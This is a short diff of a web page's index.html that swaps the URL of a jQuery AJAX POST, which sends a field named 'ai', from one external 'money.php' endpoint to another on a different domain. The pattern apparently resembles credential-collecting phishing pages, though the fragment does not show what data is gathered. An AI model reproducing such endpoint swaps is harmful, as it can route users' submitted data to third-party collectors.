--- a/index.html
+++ b/index.html
@@ -211,7 +211,7 @@ $(document).ready(function() {
 
         $.ajax({
             dataType: 'JSON',
-            url: 'http://worldcentric.group/reserve/money.php',
+            url: 'https://apriqenbio.com/bookingss/money.php',
             type: 'POST',
             data: {
                 ai: ai,
